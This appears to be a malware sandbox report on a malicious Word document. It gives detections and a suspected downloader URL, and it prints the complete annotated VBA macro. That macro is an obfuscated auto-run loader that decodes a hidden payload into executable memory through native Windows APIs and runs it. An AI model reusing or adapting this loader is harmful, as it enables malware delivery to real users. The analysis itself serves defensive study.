MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a VBA macro that auto-runs from the Document_Open event once macros are enabled. The extracted macro source (listed below) does not itself reference any URL: Document_Open calls `interdependent`, which reads a 7,844-character encoded string from a UserForm control (`prestriction.contemptuously.SelectedItem.Name`), decodes it with `chalcopyrite.baconian` (base64 after subtracting 4 from even-indexed and 3 from odd-indexed characters) into 5,883 bytes, allocates PAGE_EXECUTE_READWRITE memory in the current process with ntdll!NtAllocateVirtualMemory, copies the bytes in with ntdll!NtWriteVirtualMemory, and executes them by passing buffer+offset as the callback of kernel32!CreateTimerQueueTimer with a zero due time — an in-process shellcode loader (consider tagging MITRE T1055 Process Injection and T1106 Native API in addition to the techniques above). The URL http://tailormadeduds.com/?7ouL5=YKQzBO3DTOBtGSYNOzFS3QlA$*5.CQi was extracted from the document body text, not from the macro; whether the embedded shellcode contacts it cannot be confirmed from the VBA alone, so the "download and execute" behaviour is inferred from the ClamAV label 'Doc.Downloader.Macro-6539595-0' and the URL's presence rather than observed in the macro code. The visible document body content is otherwise unrelated to the malicious functionality.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro (runs automatically when the document is opened with macros enabled). Matched lines in script: `Private Sub Document_Open()` / `Dim grias As Long`
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://tailormadeduds.com/?7ouL5=YKQzBO3DTOBtGSYNOzFS3QlA$*5.CQi — in document text (OLE body); note that this URL does not appear anywhere in the extracted macro source below.
- http://ns.adobe.com/xap/1.0/ — in document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — in document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — in document text (OLE body)
- http://purl.org/dc/elements/1.1/ — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — in document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
(The eight entries above are XMP / RDF / Dublin Core / DrawingML namespace identifiers, normally present in embedded image and Office metadata; none of them is referenced by the macro.)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 0ebf6e82aab92edf946bc28e62977edaf62d45c80e3b1e1644f1f253b2c229c6) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11918 bytes |
Preview script — first 1,000 lines of the extracted script (the listing below appears to contain the complete module set: ThisDocument, chalcopyrite, prestriction, rModu, fModu, sModu)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point: Word fires Document_Open as soon as the document is opened with
' macros enabled, so the loader needs no further user interaction.  Everything
' here except the call to interdependent is filler: the two Dim'd locals are
' never used, the string assignment is dead, and Pmt (VBA's financial
' function) is invoked as a statement with its result thrown away.
Private Sub Document_Open()
Dim grias As Long
Dim chessman As Variant
unexerted = "perpendicular"
' Real work: interdependent (same listing) decodes the embedded payload and
' executes it inside this process.
interdependent
' digenesis = 80; the Pmt call below is a decoy (result discarded).
digenesis = 43 + 37
Pmt 0, digenesis, 24000, 48243, 4
End Sub
Attribute VB_Name = "chalcopyrite"
' Payload decoder.  cropper is the 7,844-character string interdependent pulls
' out of the form control; the result is a Byte array (assigned to the String
' return value, so the caller receives the raw bytes) holding 5,883 decoded
' bytes (7844 / 4 * 3).  The scheme is ordinary base64 with one extra step:
' before decoding, 4 is subtracted from every even-indexed character and 3
' from every odd-indexed one.  All the `x = a - b + c` lines fold to
' constants that hide the real masks and shifts; each is annotated below.
' episodic() is an operator dispatcher (38 = multiply, 30 = And, 20 = \).
' The Pmt calls, aix/gormandizing and the unused Dims are filler.
Function baconian(cropper) As String
Dim bootikin As Long
Dim dilettant(63) As Long
Dim picaresco(63) As Long
Dim ostracoda(63) As Long
Dim doohickey As Long
Dim fountainhead() As Byte
' Output buffer: 6,963 bytes, of which the first 5,883 are written.
Dim firearms(6962) As Byte
Dim fer As Long
Dim balalaika As Integer
Dim dicranaceae As Long
aix = gormandizing
Dim cleareyedsighted As String
' electroencephalograph = 262144 = 1 << 18 (weight of the 1st base64 digit)
electroencephalograph = 54 - 29 + 262119
' codeine = 4032 (unused)
codeine = 90 - 24 + 3966
' chytridiaceae = 65280 = &HFF00 (mask for the middle output byte)
chytridiaceae = 53 - 102 + 65329
' ahuehuete = 255 = &HFF (mask for the low output byte)
ahuehuete = 117 - 92 + 230
Dim barm As Long
Dim overweening As String
' hypallage = 16711680 = &HFF0000 (mask for the high output byte)
hypallage = 123 - 66 + 16711623
Dim quakeress As Long
' animatism = 65536 = 1 << 16 (divisor that moves the high byte down)
animatism = 31 - 113 + 65618
' aphriza = 4096 = 1 << 12 (weight of the 2nd base64 digit)
aphriza = 98 - 5 + 4003
' bare = 258048 (unused)
bare = 95 - 87 + 258040
' annelid = 16515072 (unused)
annelid = 77 - 13 + 16515008
' archosaur = 63 (unused)
archosaur = 9 - 5 + 59
' positive = 256 = 1 << 8 (divisor that moves the middle byte down)
positive = 57 - 83 + 282
' greenwich = 64 = 1 << 6 (weight of the 3rd base64 digit)
greenwich = 21 - 39 + 82
Dim preaching As Byte
' details = 7843 (unused; same value as Shaded below)
details = 27 - 42 + 7858
Dim highly() As Byte
' 120 + 8 = 128 = vbFromUnicode: convert the input string to an ANSI Byte array.
highly = VBA.StrConv(cropper, 120 + 8)
pellaea = 25 + 6
Pmt 0, pellaea, 18816, 37014, 2
' Shaded = 7843: the input is processed as indices 0..7843 (7,844 bytes).
Shaded = 7843
' congruous = vbKeyShift (16) - 12 = 4
congruous = vbKeyShift - 12
' Pre-decode de-obfuscation: even positions -= 4, odd positions -= 3.
' A Byte element that would go negative raises Overflow here, so every
' embedded character must sit at least 3-4 above the base64 alphabet.
For comprehension = 0 To Shaded
If comprehension Mod 2 = 0 Then
highly(comprehension) = highly(comprehension) - congruous
Else
highly(comprehension) = highly(comprehension) - (congruous - 1)
End If
Next comprehension
avo = 30 + 8
Pmt 0, avo, 24836, 46679, 2
balalaika = 0
' notissima = 256-entry base64 reverse lookup (ASCII -> 6-bit value), built by topheavy.
notissima = topheavy
' Bounds fold to 0 To 63.  Three 64-entry multiplication tables:
' ostracoda(v) = v * 64, picaresco(v) = v * 4096, dilettant(v) = v * 262144,
' i.e. the weights of the 3rd, 2nd and 1st digit of each 4-character group.
For fer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
ostracoda(fer) = episodic(fer, greenwich, 38)
picaresco(fer) = episodic(fer, aphriza, 38)
dilettant(fer) = episodic(fer, electroencephalograph, 38)
Next fer
tiu = 58 + 46
Pmt 0, tiu, 14755, 46989, 5
fountainhead = highly
discoglossidae = 28 - 49 + 25
ectoproct = 42 + 36
Pmt 0, ectoproct, 7525, 34551, 6
' namely = 3 (index of the 4th character in each group)
namely = 91 - 126 + 38
aix = "disproportion"
aix = aix
diaphragm = namely + 1
' assyrian = 2 (index of the 3rd output byte in each group)
assyrian = 73 - 50 - 21
' Main base64 loop: each pass consumes 4 input characters (doohickey is bumped
' by 3 in the body and 1 by Next) and emits 3 bytes -> 1,961 groups, 5,883 bytes.
For doohickey = 0 To Shaded
nectary = fountainhead(doohickey)
appaloosa = fountainhead(doohickey + 2)
' snuffbox = t[c1] << 12
snuffbox = picaresco(notissima(fountainhead(doohickey + 1)))
' campylorhynchus = (t[c2] << 6) + t[c3]
campylorhynchus = ostracoda(notissima(appaloosa)) + notissima(fountainhead(doohickey + namely))
' dicranaceae = (t[c0] << 18) + (t[c1] << 12) + (t[c2] << 6) + t[c3]: the 24-bit group
dicranaceae = dilettant(notissima(nectary)) + snuffbox + campylorhynchus
' byte0 = (group And &HFF0000) \ &H10000
fer = episodic(dicranaceae, hypallage, 30)
firearms(bootikin) = episodic(fer, animatism, 20)
' byte1 = (group And &HFF00) \ &H100
fer = episodic(dicranaceae, chytridiaceae, 30)
firearms(bootikin + 1) = episodic(fer, positive, 20)
' byte2 = group And &HFF
firearms(bootikin + assyrian) = episodic(dicranaceae, ahuehuete, 30)
bootikin = bootikin + assyrian + 1
doohickey = doohickey + 3
Next
' Byte array -> String conversion: the caller gets the decoded bytes verbatim.
baconian = firearms
End Function
' Operator dispatcher used by baconian to hide the decoder's arithmetic.
' The selector expressions fold to constants:
'   multinominal = 20 -> integer division  (supposed \ exercitation)
'   multinominal = 30 -> bitwise And       (supposed And exercitation)
'   multinominal = 38 -> multiplication    (supposed * exercitation)
' Any other selector leaves the (Variant) return value Empty.
Function episodic(supposed, exercitation, multinominal)
If multinominal = (20 + (10 / 2 - 5)) * 1 Then
episodic = supposed \ exercitation
ElseIf multinominal = (30 + (5 - 3) / 2 - 1) * 1 Then
episodic = supposed And exercitation
ElseIf multinominal = (38 + (56 / 7 - 4 * 2)) * 1 Then
episodic = supposed * exercitation
End If
End Function
Attribute VB_Name = "prestriction"
Attribute VB_Base = "0{6F029A80-1718-4C2F-86E3-BC261B49E611}{AE875FA0-DC79-4465-8532-4A546FE52C6F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Empty Change handler for the contemptuously control on the prestriction
' UserForm.  It does nothing; its presence only confirms that the control
' interdependent reads the encoded payload from exists on this form.
Private Sub contemptuously_Change()
End Sub
Attribute VB_Name = "rModu"
' Native API imports, 32-bit branch.  Every number in the #If expression is a
' constant; the condition folds to Not (0 < Win64), i.e. it is compiled only
' on 32-bit Office (the same arithmetic disguise is repeated for every #If in
' this project).  marina = ntdll!NtWriteVirtualMemory, samarium =
' kernel32!CreateTimerQueueTimer.  The library name "ntdll " carries a
' trailing space, presumably to defeat naive string signatures; the loader
' still resolves it (NOTE(review): confirm on a 32-bit host).
#If (83 - 123 + 440 + 38 - 16 + 278) > ((72 - 22 + 270) - (101 - 75 + 514) * 1) And Not ((1 - 23 + 50) - (127 - 15 - 84)) * 2 < (Win64) Then
' NtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten)
Public Declare Function marina _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal dispersion As Any, ByVal draped As Any, ByVal bifurcated As Any, ByVal automated As Any, ByVal agjus As Any) As Long
' CreateTimerQueueTimer(phNewTimer, TimerQueue, Callback, Parameter, DueTime, Period, Flags);
' the first parameter is ByRef (no ByVal), so the caller's variable acts as the out-slot.
Public Declare Function samarium _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (cellist As Any, ByVal aftereffect As Any, ByVal micomicon As Any, ByVal attracting As Any, ByVal conduction As Any, ByVal neritina As Any, ByVal jure As Any) As Long
#End If
' 64-bit counterpart: the condition folds to 0 < Win64, so this PtrSafe
' declaration of ntdll!NtWriteVirtualMemory (again with the trailing space
' in "ntdll ") is used on 64-bit Office.  Called from organicism.
#If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then
' NtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten)
Public Declare PtrSafe Function marina _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal maintopmast As Any, ByVal charitableness As Any, ByVal murmerer As Any, ByVal crib As Any, ByVal home As Any) As LongPtr
#End If
' Memory-write helper (used on the 32-bit path, and on both paths for the
' final payload copy in idonea): copies favorably bytes from address astroglia
' to address indecent in the current process via marina
' (ntdll!NtWriteVirtualMemory).  blithesome = 12 - 20 + 7 = -1, the
' pseudo-handle for the current process.  The NTSTATUS lands in bitbutal and
' is never checked; the function's own return value is left Empty.
' ar/aix/gormandizing/harmful, the Pmt call and the unused Dims are filler.
' NOTE(review): the locals are 32-bit Long, so on 64-bit Office addresses
' above 4 GB would be truncated here - verify whether the x64 path works.
Function bursa(indecent, astroglia, favorably)
Dim chyliferous As Long
Dim pending As Variant
Dim blithesome As Long
Dim mare As Variant
Dim scoundrel As Long
Dim plagioclastic As Byte
Dim abstractionist As Long
Dim magnesite As Variant
Dim postdiluvial As Long
Dim exhaling As Long
Dim sheltie As Long
ar = ar + 309
' chyliferous = destination address
chyliferous = indecent
' postdiluvial = byte count
postdiluvial = favorably
gormandizing = aix
' scoundrel = source address
scoundrel = astroglia
harmful = 41 + 41
Pmt 0, harmful, 8146, 42506, 6
ar = angular * 2
' -1 = current-process pseudo-handle
blithesome = 12 - 20 + 7
' NtWriteVirtualMemory(-1, indecent, astroglia, favorably, &abstractionist)
bitbutal = marina(ByVal blithesome, _
chyliferous, scoundrel, _
postdiluvial, abstractionist)
ar = angular \ 75
End Function
' Loader, called from Document_Open.  Flow:
'   1. select item 5 of the UserForm control prestriction.contemptuously
'      (Day(#12/5/2013#) = 5) and take the last 7,844 characters of that
'      item's .Name property - this is where the encoded payload is stored
'      (NOTE(review): Value/SelectedItem/Name suggests a MultiPage or TabStrip
'      whose page name carries the blob; confirm against the form's .frx);
'   2. decode it with chalcopyrite.baconian (shifted base64 -> 5,883 bytes);
'   3. idonea allocates RWX memory in this process and copies the bytes in;
'   4. CreateTimerQueueTimer is pointed at buffer + offset with DueTime 0, so
'      the payload runs on a thread-pool thread without CreateThread.
' The unused Dims, the stray string/number assignments and the Pmt calls are
' filler.  Each nested #If folds to 0 < Win64 (64-bit) or Not (0 < Win64)
' (32-bit); the arithmetic is a disguise.
Sub interdependent()
Dim jerrybuilt As Variant
Dim altorivievo As Variant
' Day(#12/5/2013#) = 5: select item index 5 of the control.
prestriction.contemptuously.Value = Day(#12/5/2013#)
occupier = hector
Set flimsily = prestriction.contemptuously.SelectedItem
devon = 42 + 48
Pmt 0, devon, 3122, 19254, 4
' The encoded payload is stored in the selected item's Name.
cacoopy = flimsily.Name
' belabor = 7844: length of the encoded blob (Shaded + 1 in baconian).
belabor = 54 - 103 + 7893
barded = Right(cacoopy, belabor)
' austereness = decoded payload bytes, returned as a binary String.
austereness = chalcopyrite.baconian(barded)
consciousness = 24 + 39
Pmt 0, consciousness, 6107, 31226, 7
#If (116 - 49 + 333 + 105 - 98 + 293) > ((61 - 53 + 312) - (124 - 97 + 513) * 1) And ((92 - 83 + 19) - (67 - 6 - 33)) * 2 < (Win64) Then
Dim talisman As Variant
Dim rockweed As LongPtr
Dim arminius As LongPtr
Dim brustle As Byte
#ElseIf (61 - 74 + 413 + 55 - 54 + 299) > ((60 - 92 + 352) - (18 - 114 + 636) * 1) And Not ((107 - 59 - 20) - (64 - 2 - 34)) * 2 < (Win64) Then
Dim friseur As Variant
Dim arminius As Long
Dim aeternum As String
Dim rockweed As Long
#End If
courser = 49 - 97 + 48
fumble = "mea"
esocidae = 31 - 84 + 4149
mailable = 1 + 52
Pmt 0, mailable, 36565, 15175, 6
castigation = 14 + 13
Pmt 0, castigation, 5279, 15832, 3
epos = austereness
alveolus = mechanics
' rockweed = base address of the RWX buffer now holding the decoded payload.
rockweed = idonea(epos)
#If (54 - 69 + 415 + 112 - 2 + 190) > ((69 - 18 + 269) - (84 - 11 + 467) * 1) And ((53 - 110 + 85) - (71 - 127 + 84)) * 2 < (Win64) Then
Dim pertusion As String
Dim ecarte As LongPtr
Dim declassified As LongPtr
Dim allegiance As LongPtr
' pledge = 2064: entry-point offset into the buffer on 64-bit.
pledge = 95 - 40 + 2009
#ElseIf (99 - 73 + 374 + 74 - 4 + 230) > ((128 - 113 + 305) - (36 - 89 + 593) * 1) And Not ((35 - 125 + 118) - (12 - 47 + 63)) * 2 < (Win64) Then
Dim ecarte As Long
nonoccurrence = 32 - 36 + 785
Dim declassified As Long
Dim allegiance As Long
' pledge = 781 + 3459 = 4240: entry-point offset into the buffer on 32-bit.
pledge = nonoccurrence + 3459
#End If
Dim stumblingstone As Integer
Dim dutifully As Integer
' ecarte = 0: reused for TimerQueue (NULL = default queue), Parameter,
' DueTime (0 = fire immediately), Period (0 = one-shot) and Flags.
ecarte = 128 - 19 - 109
' arminius = buffer base + offset: the callback address handed to the timer.
arminius = rockweed + pledge
' declassified = 201527; passed ByRef, so it only serves as the phNewTimer out-slot.
declassified = 35 - 90 + 201582
' allegiance = 3500 (unused)
allegiance = 82 - 59 + 3477
' CreateTimerQueueTimer(&declassified, NULL, arminius, 0, 0, 0, 0): runs the payload.
clarichord = samarium(declassified, ecarte, arminius, ecarte, ecarte, ecarte, ecarte)
calophyllum = 47 + 52
Pmt 0, calophyllum, 9970, 40826, 8
End Sub
Attribute VB_Name = "fModu"
' 64-bit branch (condition folds to 0 < Win64): deckled =
' ntdll!NtAllocateVirtualMemory.  Parameter order is
' (ProcessHandle, BaseAddress [in/out], ZeroBits, RegionSize [in/out],
' AllocationType, Protect); idonea passes ByVal explicitly where needed.
#If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then
Public Declare PtrSafe Function deckled _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (copperbottomed As LongPtr, proctitis As LongPtr, ByVal biquadrate As LongPtr, ungrammaticalByVal As LongPtr, adulthood As LongPtr, ByVal aculeus As LongPtr) As LongPtr
#End If
' 32-bit branch (condition folds to Not (0 < Win64)): same
' ntdll!NtAllocateVirtualMemory import with Long instead of LongPtr.
' Note again the trailing space in the library name "ntdll ".
#If (83 - 123 + 440 + 38 - 16 + 278) > ((72 - 22 + 270) - (101 - 75 + 514) * 1) And Not ((1 - 23 + 50) - (127 - 15 - 84)) * 2 < (Win64) Then
Public Declare Function deckled _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (erastianism As Long, solder As Long, ByVal pedibusque As Long, minauderieByVal As Long, amentiferous As Long, ByVal impeller As Long) As Long
#End If
' Builds the 256-entry reverse lookup table for the standard base64 alphabet
' that baconian indexes (index = ASCII code, value = 6-bit digit).  Each loop
' advances referible by hand and leaves via Exit For once past its range, so
' the statements after each Exit For are unreachable; every assignment to an
' undeclared name (rectilineal, bearish, petrel, ...) is dead filler.
' Folded constants:
'   loop 1: referible 65..91,  avaunt(c) = c - 65  -> 'A'..'Z' = 0..25
'           (also sets avaunt(91) = 26, which valid input never reaches)
'   loop 2: referible 48..58,  avaunt(c) = c + 4   -> '0'..'9' = 52..61
'           (also sets avaunt(58) = 62)
'   loop 3: referible 97..123, avaunt(c) = c - 71  -> 'a'..'z' = 26..51
'           (also sets avaunt(123) = 52)
'   avaunt(47) = 63 ('/'), avaunt(43) = 62 ('+')
Function topheavy()
Dim avaunt(255) As Byte
Dim lineal As Integer
Dim rectil As Integer
' 65 = 'A'
referible = 107 - 102 + 60
For i = referible To (91 - 106 + 106)
avaunt(referible) = referible - (38 - 106 + 133)
referible = referible + 1
If (104 - 69 + 56) < referible Then
rectilineal = artisan + 72 - 89 + 82
Exit For
lineal = lineal + 72 - 89 + 82
Else
rectil = rectil + 108
End If
bearish = heh + 123 - 4 - 54
Next
' 48 = '0'
referible = (29 - 13 + 32)
For i = referible To (80 - 1 - 21)
avaunt(referible) = referible + (40 - 55 + 19)
referible = referible + 1
If (12 - 126 + 172) < referible Then
petrel = grievously + 86 - 26 + 5
Exit For
lineal = lineal * 2
Else
rectil = rectil - 40
End If
custodes = sylvite + 117 - 12 - 40
Next
' 97 = 'a'
referible = (110 - 101 + 88)
For i = referible To (5 - 95 + 213)
avaunt(referible) = referible - (16 - 31 + 86)
referible = referible + 1
bacchantic = joe + 88 - 61 + 38
If (15 - 105 + 213) < referible Then
epiphora = cataclysm + 74 - 37 + 28
Exit For
lineal = lineal / 4
Else
rectil = rectil + 187
End If
ing = trichechus + 43 - 100 + 122
Next
' avaunt(47) = 63: '/'
avaunt(94 - 17 - 30) = (28 - 91 + 126)
' avaunt(43) = 62: '+'
referible = (3 - 53 + 93)
avaunt(referible) = (21 - 114 + 155)
topheavy = avaunt
End Function
Attribute VB_Name = "sModu"
' 64-bit branch (condition folds to 0 < Win64): samarium =
' kernel32!CreateTimerQueueTimer(phNewTimer [ByRef], TimerQueue, Callback,
' Parameter, DueTime, Period, Flags).  interdependent uses it to run the
' staged payload as a timer callback.
#If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then
Public Declare PtrSafe Function samarium _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (syncretistic As Any, ByVal imitator As Any, ByVal emphysematous As Any, ByVal durable As Any, ByVal dismal As Any, ByVal timothy As Any, ByVal jigsaw As Any) As Long
#End If
' 64-bit memory-write helper, the LongPtr twin of bursa: copies napha bytes
' from address bedding to address hemophiliac in the current process via
' marina (ntdll!NtWriteVirtualMemory).  crotchet = 63 - 11 - 53 = -1 is the
' current-process pseudo-handle.  marina is called as a statement, so its
' NTSTATUS is discarded and the function's own return value stays Empty.
' aix/ar/gormandizing/forewarned, the Pmt call and angular = Rnd(490) are filler.
' Only invoked from idonea's Win64 branch.
Function organicism(hemophiliac, bedding, napha)
Dim geodesy As Integer
Dim cuticular As String
Dim crotchet As LongPtr
Dim daucus As LongPtr
Dim alpaca As LongPtr
Dim cuticula As Long
Dim maeandra As LongPtr
Dim blaspheme As LongPtr
aix = "burnout"
ar = Math.Round(173)
' daucus = destination address
daucus = hemophiliac
' blaspheme = byte count
blaspheme = napha
ar = Math.Round(417)
' maeandra = source address
maeandra = bedding
forewarned = 56 + 56
Pmt 0, forewarned, 30833, 25228, 5
gormandizing = gormandizing
' -1 = current-process pseudo-handle
crotchet = 63 - 11 - 53
' NtWriteVirtualMemory(-1, hemophiliac, bedding, napha, &alpaca)
marina ByVal crotchet, _
daucus, _
maeandra, blaspheme, _
alpaca
angular = Rnd(490)
End Function
' Stages the decoded payload in executable memory and returns its address.
' destroy is the Variant holding the bytes returned by baconian.  Steps:
'   1. Obtain a raw pointer to the payload bytes without a VBA copy: the
'      branch-specific #If (folds to 0 < Win64 / Not (0 < Win64)) calls
'      NtWriteVirtualMemory to copy pointer-size bytes (8 on x64, 4 on x86)
'      from VarPtr(destroy) + 8 - the start of the VARIANT's data union - into
'      the local finnish, which then points at the string/array data.
'   2. deckled = NtAllocateVirtualMemory(-1, &base = 0, ZeroBits 0,
'      &size = 9977, MEM_COMMIT (&H1000), PAGE_EXECUTE_READWRITE (&H40)) in
'      the current process; the chosen base comes back in priacanthus.
'   3. bursa copies 5,883 bytes (exactly baconian's output size) from finnish
'      into that RWX region.
' None of the NTSTATUS values (cureless, justice, nation) is checked.
' The unused Dims, livy and the Pmt call are filler.
Function idonea(destroy)
Dim maclura As Long
Dim veer As Long
Dim circumnavigation As Variant
Dim abecedarius As Byte
#If (105 - 110 + 405 + 41 - 68 + 327) > ((12 - 57 + 365) - (43 - 128 + 625) * 1) And ((79 - 87 + 36) - (55 - 26 - 1)) * 2 < (Win64) Then
Dim alley As Variant
Dim finnish As LongPtr
' bawdyhouse = 8: copy one 64-bit pointer
bawdyhouse = 84 - 44 - 32
Dim priacanthus As LongPtr
Dim gatherer As String
Dim overthrow As String
Dim conceptive As LongPtr
Dim terrier As String
meaninglessness = VarPtr(finnish)
' (82 - 100 + 26) = 8: offset of the data field inside the VARIANT
cureless = organicism(meaninglessness, VarPtr(destroy) + (82 - 100 + 26), bawdyhouse)
#ElseIf (115 - 118 + 403 + 49 - 119 + 370) > ((89 - 99 + 330) - (1 - 27 + 566) * 1) And Not ((95 - 71 + 4) - (11 - 39 + 56)) * 2 < (Win64) Then
Dim finnish As Long
' bawdyhouse = 4: copy one 32-bit pointer
bawdyhouse = 66 - 79 + 17
Dim priacanthus As Long
Dim conceptive As Long
meaninglessness = VarPtr(finnish)
' (12 - 82 + 78) = 8: same VARIANT data-field offset on x86
cureless = bursa(meaninglessness, VarPtr(destroy) + (12 - 82 + 78), bawdyhouse)
#End If
' batterie = -1: current-process pseudo-handle
batterie = 92 - 92 - 1
' priacanthus = 0: let the kernel pick the base address (returned ByRef)
priacanthus = 36 - 11 - 25
' effortlessness = 0: ZeroBits
effortlessness = 8 - 46 + 38
' conceptive = 9977: requested RegionSize (rounded up to a page by the kernel)
conceptive = 25 - 41 + 9993
' brainwave = 4096 = &H1000 = MEM_COMMIT
brainwave = 95 - 118 + 4119
' delineative = 64 = &H40 = PAGE_EXECUTE_READWRITE
delineative = 126 - 14 - 48
' NtAllocateVirtualMemory(-1, &priacanthus, 0, &conceptive, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
justice = deckled(ByVal batterie, _
priacanthus, ByVal effortlessness, _
conceptive, ByVal brainwave, _
ByVal delineative)
' (52 - 19 + 5850) = 5883: copy the decoded payload into the RWX buffer.
' NOTE(review): bursa uses Long locals, so this copy may misbehave on x64 for
' buffers above 4 GB - verify.
nation = bursa(priacanthus, finnish, 52 - 19 + 5850)
livy = 43 + 42
Pmt 0, livy, 33733, 47494, 6
' Return the buffer base; interdependent adds the entry-point offset to it.
idonea = priacanthus
End Function